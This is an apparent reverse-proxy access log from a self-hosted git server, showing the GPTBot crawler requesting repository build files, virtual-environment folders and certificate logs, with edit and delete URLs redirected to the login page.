192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:35:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11259] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11462] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11883] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:16:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29830] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 945] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 10220] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10534] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11762] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9829] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 10043] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:16:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:16:35:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:35:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:35:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10303] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10099] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11488] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 38766] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:16:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 35844] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:16:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33447] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33639] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10976] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main" -[17/Feb/2026:16:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" 